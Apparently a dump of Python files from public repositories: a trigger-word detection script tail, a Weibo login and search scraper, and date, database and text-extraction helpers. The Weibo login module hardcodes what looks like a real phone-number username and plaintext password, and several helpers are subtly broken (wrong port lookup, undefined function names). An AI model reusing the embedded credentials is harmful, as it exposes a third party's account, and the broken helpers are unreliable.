# # todo: UserWarning: Error in loading the saved optimizer state. As a result, your model is starting with a freshly initialized optimizer warnings.warn('Error in loading the saved optimizer '
# # solution: installed HDFview and opened the hdf5 file and deleted the optimizer part of the file.
# model = load_model('./models/tr_model.h5')
#
# # fit the model
# opt = Adam(lr=0.0001, beta_1=0.9, beta_2=0.999, decay=0.01)
# model.compile(loss='binary_crossentropy', optimizer=opt, metrics=["accuracy"])
#
# # test the model
# loss, acc = model.evaluate(X_dev, Y_dev)
# print("Dev set accuracy = ", acc)
""" Making Predictions """
def detect_triggerword(filename):
plt.subplot(2, 1, 1)
x = graph_spectrogram(filename)
# the spectogram outputs (freqs, Tx) and we want (Tx, freqs) to input into the model
x = x.swapaxes(0, 1)
x = np.expand_dims(x, axis=0)
predictions = model.predict(x)
plt.subplot(2, 1, 2)
plt.plot(predictions[0, :, 0])
plt.ylabel('probability')
plt.show()
return predictions
chime_file = "audio_examples/chime.wav"
def chime_on_activate(filename, predictions, threshold):
audio_clip = AudioSegment.from_wav(filename)
chime = AudioSegment.from_wav(chime_file)
Ty = predictions.shape[1]
# Step 1: Initialize the number of consecutive output steps to 0
consecutive_timesteps = 0
# Step 2: Loop over the output steps in the y
for i in range(Ty):
# Step 3: Increment consecutive output steps
consecutive_timesteps += 1
# Step 4: If prediction is higher than the threshold and more than 75 consecutive output steps have passed
if predictions[0, i, 0] > threshold and consecutive_timesteps > 75:
# Step 5: Superpose audio and background using pydub
audio_clip = audio_clip.overlay(chime, position=((i / Ty) * audio_clip.duration_seconds) * 1000)
# Step 6: Reset consecutive output steps to 0
consecutive_timesteps = 0
audio_clip.export("chime_output.wav", format='wav')
filename = "./raw_data/dev/1.wav"
prediction = detect_triggerword(filename)
chime_on_activate(filename, prediction, 0.5)
filename = "./raw_data/dev/2.wav"
prediction = detect_triggerword(filename)
chime_on_activate(filename, prediction, 0.5)
``` |
{
"source": "824zzy/-",
"score": 2
} |
#### File: -/weibo_mine_hot/Refresh_cookie.py
```python
import binascii
import rsa
import base64
import requests
import re
import json
def prelogin():
url="https://login.sina.com.cn/sso/prelogin.php?entry=account&callback=sinaSSOController.preloginCallBack&su=MTU2MjAxNTE0NzU%3D&rsakt=mod&client=ssologin.js(v1.4.15)&_=1476186181803"
html=requests.get(url).text
jsonStr = re.findall(r'\((\{.*?\})\)', html)[0]
data = json.loads(jsonStr)
servertime = data["servertime"]
nonce = data["nonce"]
pubkey = data["pubkey"]
rsakv = data["rsakv"]
return servertime, nonce, pubkey, rsakv
def getSu(username):
su = base64.b64encode(username.encode('utf-8')).decode('utf-8')
return su
def getSp(password, servertime, nonce, pubkey):
pubkey = int(pubkey, 16)
key = rsa.PublicKey(pubkey, 65537)
message = str(servertime) + '\t' + str(nonce) + '\n' + str(password)
message = message.encode('utf-8')
sp = rsa.encrypt(message, key)
sp = binascii.b2a_hex(sp)
return sp
def main():
servertime, nonce, pubkey, rsakv = prelogin()
su = getSu("15802252189")
sp = getSp("kobe81", servertime, nonce, pubkey)
postData = {
'entry': 'weibo',
'gateway': '1',
'from': '',
'savestate': '7',
'userticket': '1',
"pagerefer": "http://open.weibo.com/wiki/2/statuses/home_timeline",
"vsnf": "1",
"su": su,
"service": "miniblog",
"servertime": servertime,
"nonce": nonce,
"pwencode": "rsa2",
"rsakv": rsakv,
"sp": sp,
"sr": "1440*900",
"encoding": "UTF-8",
"prelt": "126",
"url": "http://open.weibo.com/ajaxlogin.php?framelogin=1&callback=parent.sinaSSOController.feedBackUrlCallBack",
"returntype": "META",
}
loginURL = r'http://login.sina.com.cn/sso/login.php?client=ssologin.js(v1.4.18)'
session = requests.Session()
res = session.post(loginURL, data=postData)
lst= res.cookies.items()
cookie=''
for each in lst:
cookie+= each[0]+'='+each[1]+';'
with open('cookies','w') as f:
f.write(cookie)
print 'cookies have refreshed'
```
#### File: -/weibo_mine_hot/Ultimate_ComSpider.py
```python
import requests
import json
import scrapy
import re
import writers
import get_weibo_cookie
import time
from retrying import retry
import Normalize_date_time
import Refresh_cookie
import urllib
def space(s):
return re.sub('\s+', '', s)
class weibocom(object):
def __init__(self):
self.maxpage=50
self.baseurl='http://s.weibo.com/weibo'
self.session=get_weibo_cookie.login()
self.db=writers.Content()
self.headers={
'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/52.0.2743.116 Chrome/52.0.2743.116 Safari/537.36'
}
#with open('PycharmProjects/TestZhu/tjufe/weibo_mine_hot/cookies','r') as f:
with open('cookies','r') as f:
cook=f.readlines()[0]
self.cookie={'Cookie':cook}
def start_html(self,name):
self.name=urllib.quote(name)
urls=['{}/{}&nodup=1&page={}'.format(self.baseurl,self.name,page) for page in range(1,self.maxpage)]
for each in urls:
html=requests.get(each,cookies=self.cookie,headers=self.headers).text
time.sleep(10)
self.parse(html)
def parse(self, response):
htmls = re.findall('STK\.pageletM\.view\((.*?)\)<', response, re.S)
try:
rule_html = self.parse_html_by_pid(htmls)
except:
rule_html = None
if rule_html:
self.extract_one_page(rule_html)
else:
print htmls
# @retry(_stop_max_attempt_number=2)
def parse_html_by_pid(self, htmls):
for each in htmls:
pid = json.loads(each)['pid']
if pid == u'pl_weibo_direct':
return json.loads(each)['html']
print 'cookie unuse?'
Refresh_cookie.main()
print 'restart...'
self.start_html(self.name)
def extract_one_page(self, html):
con_lst = scrapy.Selector(text=html).xpath('.//div[@class="WB_cardwrap S_bg2 clearfix"]')
length=len(con_lst)
print 'the length of constant page is {}'.format(length)
if length<8:
Refresh_cookie.main()
print 'restart...'
self.start_html(self.name)
for each in con_lst:
msg_id = each.xpath('.//div[@mid]/@mid').extract_first()
msg_url_action_data = each.xpath('.//ul[@class="feed_action_info feed_action_row4"]/li[2]/a[@action-data]/@action-data').extract_first()
msg_url = re.search('url=(.*?)&',msg_url_action_data).group(1)
msg_user_id= re.search('weibo.com/(.*?)/',msg_url).group(1)
content_lst = each.xpath('.//p[@class="comment_txt"]')
msg_content = "".join([p.xpath('string(.)').extract_first().strip() for p in content_lst])
contain = each.xpath('.//div[@class="feed_from W_textb"]')
pretime = contain.xpath('.//a[@node-type="feed_list_item_date"]/text()').extract_first()
try:
msg_time = Normalize_date_time.normalize_datetime(pretime)
except:
msg_time=None
pass
resource = contain.xpath('.//a[@rel="nofollow"]/text()').extract_first()
msg_up= msg_cmt = msg_resport = msg_collection = 0
comment_msg = each.xpath('.//div[@class="feed_action clearfix"]/ul/li')
for every in comment_msg:
value = every.xpath('string(.)').extract_first()
if u'收藏' in value:
try:
msg_collection = re.search('(\d+)', value).group(1)
except:
pass
if u'转发' in value:
try:
msg_resport = re.search('(\d+)', value).group(1)
except:
pass
if u'评论' in value:
try:
msg_cmt = re.search('(\d+)', value).group(1)
except:
pass
if every.xpath('.//a[@title]/@title').extract_first() == u'赞':
msg_up = every.xpath('string(.)').extract_first()
is_resport = each.xpath('.//div[@class="comment"]')
msg_resport_url = ''
if is_resport:
msg_resport_url_source = is_resport.xpath(
'.//a[@suda-data="key=tblog_search_weibo&value=weibo_zhuan_p"]/@href').extract_first()
msg_resport_url = re.search('(^.*?)\?', msg_resport_url_source).group(1)
m=(self.name,msg_id,msg_url,msg_user_id,msg_content,msg_time,resource,msg_up,msg_resport,msg_cmt,msg_collection,msg_resport_url)
print m
self.db.insertIntoDB1(m)
if msg_resport_url:
self.extract_one_article(msg_resport_url)
@retry(stop_max_attempt_number=3)
def extract_html_bydomid(self,url):
response=requests.get(url,headers=self.headers,cookies=self.cookie).text
htmls=re.findall('<script>FM\.view\((.*?)\)</script>', response, re.S)
for html in htmls:
try:
if re.match(u'Pl_Official_WeiboDetail__\d+', json.loads(html)['domid']):
return json.loads(html)['html']
except:
continue
print 'dont exist weibodetail'
def extract_one_article(self,url):
try:
html=self.extract_html_bydomid(url)
selector=scrapy.Selector(text=html)
weibo_id=selector.xpath('.//div[@class="WB_from S_txt2"]/a/@name').extract_first()
weibo_time_pre = selector.xpath('.//div[@class="WB_from S_txt2"]/a[@node-type="feed_list_item_date"]/text()').extract_first()
weibo_time = Normalize_date_time.normalize_datetime(weibo_time_pre)
weibo_content=space(selector.xpath('.//div[@node-type="feed_list_content"]')[0].xpath('string(.)').extract_first())
weibo_up = selector.xpath('.//span[@node-type="like_status"]')[0].xpath('string(.)').extract_first()
weibo_report = selector.xpath('.//span[@class="line S_line1" and @node-type="forward_btn_text"]')[0].xpath('string(.)').extract_first()
weibo_comment = selector.xpath('.//span[@class="line S_line1" and @node-type="comment_btn_text"]')[0].xpath('string(.)').extract_first()
try:
weibo_up = re.search('(\d+)', weibo_up).group(1)
except:
weibo_up = 0
try:
weibo_report = re.search('(\d+)', weibo_report).group(1)
except:
weibo_report = 0
try:
weibo_comment = re.search('(\d+)', weibo_comment).group(1)
except:
weibo_comment=0
m=(self.name,url,weibo_id,weibo_time,weibo_content,weibo_up,weibo_report,weibo_comment)
self.db.inserIntoDB2(m)
print m
except:
pass
p=weibocom()
p.start_html('张清扬')
``` |
{
"source": "825477418/XX",
"score": 3
} |
#### File: XX/Date/DatetimeHelper.py
```python
import datetime
import time
import pandas as pd
import XX.funclib as cfun
# 获取距离今天的某段时间的时间戳
def get_add_date_ts(month=0, day=1, start_ts=None):
if start_ts:
x = time.localtime(start_ts)
else:
x = time.localtime(time.time())
Y = int(time.strftime('%Y', x))
M = int(time.strftime('%m', x))
D = int(time.strftime('%d', x))
z = datetime.datetime(Y, M, D)
starts = str(z + pd.tseries.offsets.DateOffset(months=month, days=day))
ts = int(time.mktime(time.strptime(starts, '%Y-%m-%d %H:%M:%S')))
return ts
# 字符串转时间戳
def str_to_ts(str1):
return int(time.mktime(time.strptime(str1, '%Y-%m-%d %H:%M:%S')))
# 时间戳转换为日期
def ts_to_date(ts=time.time()):
return time.strftime('%Y-%m-%d', time.localtime(ts))
# 时间戳转换为日期
def ts_to_datetime(ts=time.time()):
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts))
# 时间戳转换为时间
def ts_to_time(ts=time.time()):
return time.strftime('%H:%M:%S', time.localtime(ts))
# 获取现在的时间
def get_now_time(ts=time.time()):
return time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(ts))
# 获取今天的日期
def get_today(ts=time.time()):
return time.strftime('%Y-%m-%d', time.localtime(ts))
# 获取今天的月份
def get_this_month(ts=time.time()):
return time.strftime('%Y-%m', time.localtime(ts))
# 获取当前小时
def get_hours(ts=time.time()):
return time.strftime('%H', time.localtime(ts))
# 获取计算时间
def get_calc_date(s):
return cfun.str_to_standard_time(s)
def is_date(date):
try:
date = date.strip()
if len(date) == 0:
return False
if ":" in date:
if date.count(":") == 1:
time.strptime(date, "%Y-%m-%d %H:%M")
elif date.count(":") == 2:
time.strptime(date, "%Y-%m-%d %H:%M:%S")
elif "-" in date:
time.strptime(date, "%Y-%m-%d")
elif "/" in date:
time.strptime(date, "%Y/%m/%d")
elif "." in date:
time.strptime(date, "%Y.%m.%d")
elif len(date) == 8:
time.strptime(date, "%Y%m%d")
return True
except Exception as e:
return False
def get_date(date):
date = date.replace("年", "-").replace("月", "-").replace("日", "").replace("号", "").replace("点", ":").replace("时",
":").replace(
"分", ":").replace("秒", "")
date = cfun.str_to_standard_time(date)
try:
date = date.strip()
if len(date) == 0:
return False
date = cfun.str_to_standard_time(date)
if ":" in date:
if date.count(":") == 1:
date = time.strptime(date, "%Y-%m-%d %H:%M")
elif date.count(":") == 2:
date = time.strptime(date, "%Y-%m-%d %H:%M:%S")
elif "-" in date:
if len(date.split("-")[0]) == 4:
# "2018-01-01"
date = time.strptime(date, "%Y-%m-%d")
elif len(date.split("-")[0]) == 2 and date.count("-") == 2:
date = time.strptime("20" + date, "%Y-%m-%d")
elif len(date.split("-")[0]) == 2 and date.count("-") == 1:
date = time.strptime(get_today()[:4] + "-" + date, "%Y-%m-%d")
elif "/" in date:
date = time.strptime(date, "%Y/%m/%d")
elif "." in date:
date = time.strptime(date, "%Y.%m.%d")
elif len(date) == 8:
date = time.strptime(date, "%Y%m%d")
else:
date = ""
return time.strftime('%Y-%m-%d', date)
except Exception as e:
print(e)
return ""
# 时间戳转为iso8601时间
def ts_to_iso8601(ts=time.time(), format_='%Y-%m-%dT%H:%M:%S.%fZ'):
format_ = format_.replace('%f', '{-FF-}') # 订单处理微秒数据 %f
length = min(16, len(str(ts))) # 最多去到微秒级
# 获取毫秒/微秒 数据
sec = '0'
if length != 10: # 非秒级
sec = str(ts)[:16][-(length - 10):] # 最长截取16位长度 再取最后毫秒/微秒数据
sec = '{:0<6}'.format(sec) # 长度位6,靠左剩下的用0补齐
timestamp = float(str(ts)[:10]) # 转换为秒级时间戳
return datetime.datetime.utcfromtimestamp(timestamp).strftime(format_).replace('{-FF-}', sec)
if __name__ == '__main__':
print(ts_to_iso8601())
```
#### File: XX/DB/HappyBaseHelper.py
```python
import happybase
class HappyBaseHeleper:
connection = None
table = None
pool = None
def __init__(self, **kw):
if kw:
self.connection = happybase.Connection(**kw)
def get_connection_pool(self, size=128, **kw):
self.pool = happybase.ConnectionPool(**kw, size=size)
return self.pool
def get_connection(self, **kwargs):
if kwargs.get("host"):
self.connection = happybase.Connection(**kwargs)
return self.connection
def get_table(self, table_name, conn=None, pool=None):
self.connection = conn if conn else self.connection
return self.connection.table(table_name)
# 创建表
def create_table(self, table_name, columns, conn=None):
self.connection = conn if conn else self.connection
return self.connection.create_table(table_name, columns)
# 获取表
def get_tables(self, conn=None):
self.connection = conn if conn else self.connection
return self.connection.tables()
# 删除表
def del_table(self, table_name, disable=False, conn=None):
self.table = self.get_table(table_name, conn) if table_name else self.table
return self.connection.delete_table(self.table, disable)
# 获取行
def get_row(self, row, conn=None, table_name=None):
self.table = self.get_table(table_name, conn) if table_name else self.table
return self.table.row(row)
# 获取列表
def get_rows(self, row, conn=None, table_name=None):
self.table = self.get_table(table_name, conn) if table_name else self.table
return self.table.row(row)
# 删除行或列
def del_row(self, row, columns=None, conn=None, table_name=None):
self.table = self.get_table(table_name, conn) if table_name else self.table
return self.table.delete(row, columns)
# 添加行
def add_row(self, row, data, timestamp=None, wal=True, conn=None, table_name=None):
self.table = self.get_table(table_name, conn) if table_name else self.table
return self.table.put(row, data, timestamp=None, wal=True)
```
#### File: XX/DB/HBaseHelper.py
```python
import time
from hbase import Hbase
from hbase.ttypes import *
from thrift.transport import TSocket
import XX.Encrypt.EncryptHelper as enc
class HBaseHelper:
client = None
def __init__(self, **kw):
self.transport = TSocket.TSocket(kw.get("host", "localhost"), kw.get("port", 9090))
self.transport.open()
self.protocol = TBinaryProtocol.TBinaryProtocol(self.transport)
self.client = Hbase.Client(self.protocol)
def get_client(self, **kw):
transport = TSocket.TSocket(kw.get("host", "localhost"), kw.get("port", 9090))
transport.open()
protocol = TBinaryProtocol.TBinaryProtocol(transport)
self.client = Hbase.Client(protocol)
return self.client
def get_client_by_cfg(self, cfg):
return self.get_client(**cfg)
# 获取最近三天的新数据
def get_crawl_cache_response(self, table_name, spider_name, url, expire_seconds=86400, client=None):
self.client = client if client else self.client
result = self.client.getRowWithColumns(table_name, spider_name + "_" + enc.Encrypt.md5(url), ["data:json"])
if result:
if time.time() - result[0].columns.get('data:json').timestamp // 1000 <= expire_seconds:
return result[0].columns.get('data:json').value
# 添加缓存数据
def add_crawl_cache_response(self, project, spider_name, url, fc, value, client=None):
self.client = client if client else self.client
mutation = Mutation(column=fc, value=value)
return self.client.mutateRow("crawl_cache_" + project, spider_name + "_" + enc.Encrypt.md5(url), [mutation])
# 创建表
def create_table(self, table_name, columns, client=None):
self.client = client if client else self.client
self.client.createTable(table_name, columns)
# 获取表
def get_tables(self, client=None):
self.client = client if client else self.client
return self.client.getTableNames()
# 删除整行
def del_row(self, table_name, row, client=None):
self.client = client if client else self.client
return self.client.deleteAllRow(table_name, row)
# 删除列
def del_row_columns(self, table_name, row, column, client=None):
self.client = client if client else self.client
self.client.deleteAll(table_name, row, column)
# 遍历表
def get_lists(self, table, start_row, columns, limit=10, client=None):
self.client = client if client else self.client
scan_id = self.client.scannerOpen(table, start_row, columns)
return self.client.scannerGetList(scan_id, limit)
# 添加列
def add_row_column(self, table, row, fc, value, client=None):
self.client = client if client else self.client
mutation = Mutation(column=fc, value=value)
return self.client.mutateRow(table, row, [mutation])
if __name__ == '__main__':
hb = HBaseHelper(host="zhihan00")
print(hb.get_tables())
exit()
columns = list()
columns.append(ColumnDescriptor(name='source'))
columns.append(ColumnDescriptor(name='data'))
hb.create_table("crawl_zhihan", columns)
exit()
start_row = ""
while 1:
results = hb.get_lists("crawl_cache_zhihan", start_row, ["source"])
if not results:
print("All Over")
break
for result in results:
startRow = result.row
print(result.row, result.columns["source:url"].value)
time.sleep(0.5)
print("--")
```
#### File: XX/DB/MongoHelper.py
```python
import pymongo
class MongoHelper():
def __init__(self, *arg, **kw):
self.host = kw.get("host", "localhost")
self.port = kw.get("host", 27017)
@staticmethod
def get_connection(host="localhost", port=2707, pwd=None):
return pymongo.MongoClient(host, port)
@staticmethod
def get_connection_db(host="localhost", port=2707, db=None, pwd=None):
conn = MongoHelper.get_connection(host, port)
return conn.db
@staticmethod
def get_collection(host="localhost", port=2707, db=None, collection_name=None, username=None, password=None):
db = MongoHelper.get_connection_db(host, port, db)
return db.collection_name
if __name__ == '__main__':
import XX.Model.Struct.MongoConn as MC
config = MC.zhihan00_cfg
client = MongoHelper.get_connection(**config)
db = client.dbname
col = db.col
print(db)
print(col)
print(col.insert_one({"x": 12}).inserted_id)
```
#### File: 825477418/XX/funclib.py
```python
import datetime
import json
import re
import traceback
# !!!废弃的函数,兼容以前的spider,保留此函数
def unicode_to_str(text, encoding=None, errors='strict'):
"""Return the str representation of text in the given encoding. Unlike
.encode(encoding) this function can be applied directly to a str
object without the risk of double-decoding problems (which can happen if
you don't use the default 'ascii' encoding)
"""
if encoding is None:
encoding = 'utf-8'
if isinstance(text, bytes):
return text.encode(encoding, errors)
elif isinstance(text, str):
return text
else:
raise TypeError('unicode_to_str must receive a unicode or str object, got %s' % type(text).__name__)
# 内置数据类型转换成 str
def to_str(data):
if isinstance(data, (int, float, bool)) or data is None:
return str(data)
elif isinstance(data, bytes):
return data.encode('utf-8')
elif isinstance(data, str):
return data
elif isinstance(data, list):
return __list_to_str(data)
elif isinstance(data, dict):
return __dict_to_str(data)
elif isinstance(data, tuple):
return __tuple_to_str(data)
elif isinstance(data, set):
return __set_to_str(data)
elif isinstance(data, (datetime.datetime, datetime.date)):
return __datetime_to_str(data)
else:
print('Dont know how to change %s to str!' % str(type(data)))
return ''
# 字典转换成字符串, 其中的unicode自动转换成str
def __dict_to_str(data_dict):
line = '{'
# print data_dict.items()
for k, v in data_dict.items():
line += '%s: %s, ' % (k, to_str(v))
return line.strip(', ') + '}'
# 列表转换成字符串, 其中的unicode自动转换成str
def __list_to_str(data_list):
line = '['
for var in data_list:
line += '%s, ' % to_str(var)
return line.strip(', ') + ']'
# tuple转换成str, 其中的unicode自动转换成str
def __tuple_to_str(data_tuple):
return '(' + __list_to_str(list(data_tuple)).strip('[]') + ')'
# set转换成str, 其中的unicode自动转换成str
def __set_to_str(data_set):
return 'set(' + __list_to_str(list(data_set)) + ')'
def __datetime_to_str(date_time):
if isinstance(date_time, datetime.date):
return str(date_time)
return date_time.strftime('%Y-%m-%d %H:%M:%S %f')
# !!!废弃的函数,兼容以前的spider,保留此函数
def json_to_dict(target_unicode_str):
try:
target = target_unicode_str[target_unicode_str.index("{"):]
return json.loads(target)
except:
pass
# json转字典(gbk)
def json_to_dict_gbk(target_gbk_str):
try:
return json.loads(__json_to_standard(target_gbk_str), encoding="gbk")
except:
pass
# json转字典(utf8)
def json_to_dict_utf8(target_utf8_str):
try:
return json.loads(__json_to_standard(target_utf8_str), encoding="utf-8")
except:
pass
# 内置函数
def __json_to_standard(target_str):
target = target_str[target_str.index("{"):]
target = target[:target.rindex("}") + 1]
return target
# 取列表中最大数值, 一般页数是从1开始的
def list_max_number(target_list):
new_list = []
for i in target_list:
i_buffer = ''
for j in i:
if j.isdigit() == True:
i_buffer += j
if i_buffer.isdigit() == True:
new_list.append(int(i_buffer))
if new_list:
return int(max(new_list))
else:
return 1
# 清洗字符串中的换行空格和回车
def clean_str_space(target_str):
return "".join(target_str.split())
# 清洗字符串中的html标签
def clean_str_label(target_str):
re_flag = re.compile(r'<[^>]*>', re.S)
result = re_flag.sub('', target_str)
return result
# 字符串转list
def str_to_list(target_str):
if isinstance(target_str, str):
if target_str == '':
return []
elif target_str[0] == '[' and target_str[-1] == ']':
xlist = []
for i in target_str[1:-1].split(','):
if i == '' or i == ' ':
continue
xlist.append(i)
return xlist
else:
raise TypeError(
'String must be have [ and ], got %s' % type(target_str).__name__)
else:
raise TypeError('Type must be string, got %s' %
type(target_str).__name__)
# 字符串转字典
def str_to_dict(target_str):
dict = {}
for i in target_str.split(';'):
if '=' in i:
dict[i.split('=')[0]] = i.split('=')[1]
else:
continue
return dict
# 从字符串提取数字
def str_to_digit(target_str):
try:
if isinstance(target_str, bytes):
target_str = to_str(target_str)
if len(target_str) > 0:
return int(re.sub("\D", "", target_str))
else:
print("no str")
return None
except:
traceback.print_exc()
return None
# 从字符串中提取时间
def str_to_time(target_timestr):
try:
if isinstance(target_timestr, bytes):
target_timestr = to_str(target_timestr)
r = re.search(
u'\d{4}(:|-|\\|/|年)\d{1,2}(:|-|\\|/|月)\d{1,2}(|日) \d{1,2}(:|-|\\|/|时|点)\d{1,2}', target_timestr)
if r:
return r.group(0)
else:
return None
except:
return None
# 日期计算,通过XX小时,分,天,周来计算时间
def str_to_standard_time(target_cntime_str):
now = datetime.datetime.now()
# calc计算方式,False 减, True 加
if isinstance(target_cntime_str, bytes):
target_cntime_str = to_str(target_cntime_str)
if '前' in target_cntime_str:
calc = False
elif '后' in target_cntime_str:
calc = True
else:
return target_cntime_str
if '秒' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(seconds=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(seconds=str_to_digit(target_cntime_str))
elif '分' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(minutes=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(minutes=str_to_digit(target_cntime_str))
elif '时' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(hours=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(hours=str_to_digit(target_cntime_str))
elif '天' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(days=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(days=str_to_digit(target_cntime_str))
elif '周' in target_cntime_str:
if calc:
stand_time = now + datetime.timedelta(weeks=str_to_digit(target_cntime_str))
else:
stand_time = now - datetime.timedelta(weeks=str_to_digit(target_cntime_str))
else:
raise ValueError('target_cntime_str must include 时分秒天周, and so on ')
return stand_time.strftime('%Y-%m-%d %H:%M:%S')
# 清空字典中空数据
def clean_dict(data_dict):
if isinstance(data_dict, dict):
for k, v in data_dict.items():
if not v == 0 and not v:
data_dict.pop(k)
else:
if '.' in k:
data_dict[re.sub('\.', '~', k)] = data_dict.pop(k)
clean_dict(v)
elif isinstance(data_dict, list):
for var in data_dict:
clean_dict(var)
return data_dict
if __name__ == "__main__":
print(str_to_standardtime("2天前"))
```
#### File: XX/HBase/DMHelper.py
```python
import XX.Encrypt.EncryptHelper as Enc
def add_HBase(spider, url, html, project_name, conn, row=None):
table = conn.connection.table("crawl_" + project_name)
row = spider + "_" + Enc.Encrypt.md5(url) if not row else row
if table.row(row):
print("==Exists\t" + row)
return -1
data = {
"source:url": str(url),
"source:html": str(html),
"source:type": "html",
"source:size": str(len(html)),
}
conn.addRowColumn(row, data, table=table)
return 1
```
#### File: XX/HTML/html_to_article.py
```python
import re
import traceback
from lxml import etree
from scrapy import Selector
class GetNewsArticle(object):
def __init__(self, unicode_url='', unicode_html='', *args, **kwargs):
self.url = unicode_url
if type(unicode_html) == str:
self.html = unicode_html
else:
self.html = unicode_html
if self.url is '' or self.html is '':
raise ValueError('url or html is null ')
self.article_content = ''
def __by_xpath(self):
try:
tree = etree.HTML(self.html)
except:
tree = etree.HTML(self.html.encode("utf-8"))
# for 腾讯新闻
if 'qq.com' in self.url:
for i in tree.xpath('//div[@id="Cnt-Main-Article-QQ"]//p//text()'):
self.article_content += i
# for 今日头条新闻
elif 'toutiao.com' in self.url:
for i in tree.xpath('//div[@class="article-content"]//text()'):
self.article_content += i
# for 新浪新闻
elif 'sina.com.cn' in self.url:
for i in tree.xpath('//div[@id="artibody" or @id="articleContent" or @id="j_articleContent"]//p//text()'):
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
if not self.article_content:
# ??
for i in tree.xpath('//div[@id="artibody" or @id="articleContent" or @id="j_articleContent"]//p'):
self.article_content = self.article_content + cfun.clean_str_label(i.xpath("string(.)")) + '\n'
# for 搜狐新闻
elif 'sohu.com' in self.url:
for i in tree.xpath('//div[@id="contentText"]//text()'):
self.article_content += i
# for 网易新闻
elif '163.com' in self.url:
for i in tree.xpath('//div[@id="endText"]//text()'):
self.article_content += i
# for 汽车之家新闻
elif 'autohome.com.cn' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@id="articleContent" or @class="dealertext" or @id="newsbody"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 车质网新闻
elif '12365auto.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="show" or @class="sp_new_show"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 易车网新闻
elif 'bitauto.com' in self.url or 'yiche.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="text_box" or @id="openimg_articlecontent"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 一点资讯
elif 'yidianzixun.com' in self.url:
for i in Selector(text=self.html).xpath('//div[@id="imedia-article" or @class="content-bd"]//p//text()'):
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 太平洋汽车
elif 'pcauto.com.cn' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="artText clearfix" or @class="artText"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 爱卡汽车 newsbody
elif 'xcar.com.cn' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@id="newsbody" or @class="artical_player_wrap"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 车讯网
elif 'chexun.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="news-editbox"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
# for 买车网
elif 'maiche.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="content-left"]//div[@class="detail"]//p//text()'):
if i:
self.article_content = self.article_content + cfun.clean_str_label(str(i)) + '\n'
# for 凤凰网
elif 'ifeng.com' in self.url:
# ??
for i in Selector(text=self.html).xpath('//div[@class="arl-c-txt"]/p').extract():
self.article_content = self.article_content + cfun.clean_str_label(i) + '\n'
else:
self.article_content = ''
self.article_content = cfun.clean_str_label(self.article_content)
if len(self.article_content) < 2:
return False
else:
return True
def __run(self):
if not self.__by_xpath():
ex = htmltoarticle(html=self.html)
self.article_content = ex.get_ariticle()
def get_article(self):
try:
self.__run()
except:
traceback.print_exc()
self.article_content = ''
if len(self.article_content) < 2:
return ""
else:
return self.article_content
class htmltoarticle(object):
def __init__(self, *args, **kwargs):
self.html = kwargs.pop('html', '')
if self.html is '':
raise ValueError('html is null ')
self.lines = []
self.block = []
self.threshold_value = 172
# 移除HTML标签
def __removeLabel(self):
re_doctype = re.compile(r'(?is)<!DOCTYPE.*?>', re.S)
self.html = re_doctype.sub('', self.html)
re_comment = re.compile(r'(?is)<!--.*?-->', re.S)
self.html = re_comment.sub('', self.html)
re_javascript = re.compile(r'(?is)<script.*?>.*?</script>', re.S)
self.html = re_javascript.sub('', self.html)
re_css = re.compile(r'(?is)<style.*?>.*?</style>', re.S)
self.html = re_css.sub('', self.html)
re_special_char = re.compile(r'&.{2,5};|&#.{2,5};', re.S)
self.html = re_special_char.sub('', self.html)
re_other_tag = re.compile(r'(?is)<.*?>', re.S)
self.html = re_other_tag.sub('', self.html)
re_empty_char = re.compile(r'\\s', re.S)
self.html = re_empty_char.sub('', self.html)
# 移除空格
def __removeSpace(self, target_str):
return "".join(target_str.split())
# 按行分割,并移除每行首尾的空格
def __statistic_line(self):
for line in self.html.splitlines(False):
line = self.__removeSpace(line)
self.lines.append(line)
# 获取1-blockwidth行中每行有多少字符
def __statistic_block(self, blockwidth):
i = 0
while i < len(self.lines) - blockwidth:
block_len = 0
j = 0
while j < blockwidth:
block_len += len(self.lines[i + j])
j += 1
self.block.append(block_len)
i += 1
# 不知道干什么用的
def __find_Surge(self, start, threshold):
i = start
while i < len(self.block):
if self.block[i] > threshold and self.block[i + 1] > 0 and self.block[i + 2] > 0 and self.block[i + 3] > 0:
return i
i += 1
return -1
def __find_Dive(self, surgePoint):
i = surgePoint + 1
while i < len(self.block):
if self.block[i] == 0 and self.block[i + 1] == 0:
return i
i += 1
return len(self.block) - 1
def __run(self):
start = 0
end = 0
article_content = ''
while True:
start = self.__find_Surge(end, self.threshold_value)
if start < 0:
break
end = self.__find_Dive(start)
for i in range(start, end + 1):
article_content += self.lines[i]
article_content += '\n'
return article_content
def get_ariticle(self):
self.__removeLabel()
self.__statistic_line()
self.__statistic_block(3)
return self.__run()
if __name__ == '__main__':
import XX.HTTP.RequestsHelper as creq
url = "http://www.chexun.com/2018-04-20/105255634.html"
r = creq.RequestHelper.SendCacheRequest(url)
if r.status_code == 200:
